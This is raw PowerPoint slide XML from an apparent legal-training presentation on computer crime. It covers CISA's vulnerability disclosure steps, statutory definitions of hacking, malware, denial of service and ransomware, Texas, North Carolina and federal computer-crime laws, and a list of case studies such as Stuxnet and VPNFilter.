          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="24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CISA vulnerability analysis</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Monitoring public sources of vulnerability information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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Direct notification of vulnerabilities to CISA.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" fontAlgn="ct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After receiving a report, CISA does an initial surface analysis to eliminate duplicates and false alarms.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CISA then catalogs the vulnerabilities, including all of the information (public and private) that is known at that point.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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3319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CISA Vulnerability Disclosure Policy</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1938992"/>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Analysis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Once the vulnerabilities are catalogued, vendor and CISA analysts work to understand the vulnerabilities by examining and identifying the issues, as well as the potential threat.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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1319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CISA Vulnerability Disclosure Policy</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4893647"/>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Mitigation Coordination</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After analyzing a vulnerability, CISA will continue to work with the vendor for development of mitigation and issuance of patches or new versions.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CISA has established secure and trusted relationships with vendors to facilitate vulnerability disclosure and overall technology assessment and testing functions. </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CISA will work with vendors to allow sufficient time to effectively resolve and perform patch regression testing against any given vulnerability.</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Additionally, CISA has experience successfully coordinating responses to vulnerabilities that affects multi-vendor products.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311395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2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Originally not necessarily malicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Act of gaining unauthorized privileged access to an electronic device</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356123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CISA Vulnerability Disclosure Policy</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1938992"/>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Application of Mitigation</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CISA works with the vendor to facilitate sufficient time for affected end users to obtain, test, and apply mitigation strategies prior to public disclosure when possible.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14725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CISA Vulnerability Disclosure Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1C6508C-AAD5-4A92-83D2-8456523DD882}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="11099418" cy="4154984"/>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Disclosure</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After coordinating with vendors and gathering technical and threat information, CISA will take appropriate steps to notify end users about the vulnerability via multiple channels.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CISA strives to disclose accurate, neutral, objective information focused on technical remediation and mitigation for asset owners and operators.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CISA will reference available related information and correct misinformation when possible.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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0008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Computer Crime Statutes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D630275-C576-41E4-A778-EC578FBFF2FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="3354765"/>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Hacking, Unauthorized Access, Computer Trespass, Viruses, Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="20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"Unauthorized access" entails approaching, trespassing within, communicating with, storing data in, retrieving data from, or otherwise intercepting and changing computer resources without consent.</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These laws relate to either or both, or any other actions that interfere with computers, systems, programs or networks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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62804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Computer Crime Statutes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D630275-C576-41E4-A778-EC578FBFF2FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4093428"/>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Hacking, Unauthorized Access, Computer Trespass, Viruses, Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="20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Viruses or contaminants are a set of computer instructions that are designed to modify, damage, destroy, record, or transmit information within a computer system or network without the permission of the owner.</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Generally, they are designed to infect other computer programs or computer data, consume resources, modify, destroy, record or transmit data, and disrupt normal operation of a computer system.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405197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Computer Crime Statutes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D630275-C576-41E4-A778-EC578FBFF2FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4708981"/>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Texas Penal Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Title 7: Offenses Against Property</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 33: Computer Crimes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Section 33.02: Breach of Computer Security</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 person commits an offense if the person knowingly accesses a computer, computer network, or computer system without the effective consent of the owner.</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Section 33.021: Online Solicitation of a Minor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Section 33.022: Electronic Access Interference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Section 33.023: Electronic Data Tampering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Section 33.024: Unlawful Decryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40974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Computer Crime Statutes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D630275-C576-41E4-A778-EC578FBFF2FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4462760"/>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Denial of Service Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="20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Denial-of-service Attack (DoS): an attacker floods the bandwidth or resources of a targeted system or servers with traffic, thereby preventing legitimate users from accessing information or services.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Distributed Denial-of-service Attack (DDoS): the attacker compromises and takes control of multiple computers with security flaws and uses them to launch the denial-of-service attack.</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At least 25 states have laws that directly address denial-of-service attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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1433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Computer Crime Statutes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D630275-C576-41E4-A778-EC578FBFF2FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="3046988"/>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North Carolina General Statutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Article 60: Computer-Related Crime</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Section 14-456: Denial of Computer Services to an Authorized User</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Section 14-456.1: Denial of Government Computer Services to an Authorized User</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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61798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Computer Crime Statutes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D630275-C576-41E4-A778-EC578FBFF2FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4524315"/>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Ransomware and Computer Extortion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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Ransomware is computer malware that is installed covertly on a victim's computer and preventing access to it, followed by demands for a ransom payment in exchange for returning access or not publishing or exposing data held on the computer.</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At least five states: California, Connecticut, Michigan, Texas and Wyoming, expressly address “ransomware” and/or computer extortion in statute, as follows. However, existing laws in other states that prohibit extortion and computer crimes such as malware or computer trespass may also be used to prosecute ransomware crimes. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83038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Computer Crime Statutes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D630275-C576-41E4-A778-EC578FBFF2FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4093428"/>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Texas Penal Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Title 7: Offenses Against Property</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 33: Computer Crimes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Section 33.023: Electronic Data Tampering</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In this section, "ransomware" means a computer contaminant or lock that restricts access by an unauthorized person to a computer, computer system, or computer network or any data in a computer, computer system, or computer network under circumstances in which a person demands money, property, or a service to remove the computer contaminant or lock, restore access to the computer, computer system, computer network, or data, or otherwise remediate the impact of the computer contaminant or lock.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367819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Prosecuting Computer Crimes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4216539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Computer Fraud and Abuse Act</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Obtaining National Security Information</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Accessing a Computer and Obtaining Information</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Trespassing in a Government Computer</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Accessing to Defraud and Obtain Value</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Damaging a Computer or Information</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Trafficking in Passwords</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Threatening to Damage a Computer</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Attempt and Conspiracy</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Forfeiture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5971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1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Social Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Using human confidence to gain access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“con”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117321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Prosecuting Computer Crimes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="2000548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Wiretap Act</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRP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Intercepting a Communication</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Disclosing an Intercepted Communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-28575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Using an Intercepted Communication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294760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Prosecuting Computer Crimes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Other Network Crime Statutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRP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Unlawful Access to Stored Communications</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Identity Theft</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Aggravated Identity Theft</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Access Device Fraud</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CAN-SPAM Act</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Wire Fraud</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Communication Interference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372803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F8E64-3BF1-4325-9006-C62F3185D4F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921329" y="2413337"/>
            <a:ext cx="8349342"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Case Study Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36994607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Case Study Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4401205"/>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Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Cyber Kill Chain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Kevin Mitnick</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Stuxnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OilRig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Iranian Threat Group – URL Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>VPNFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> Malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
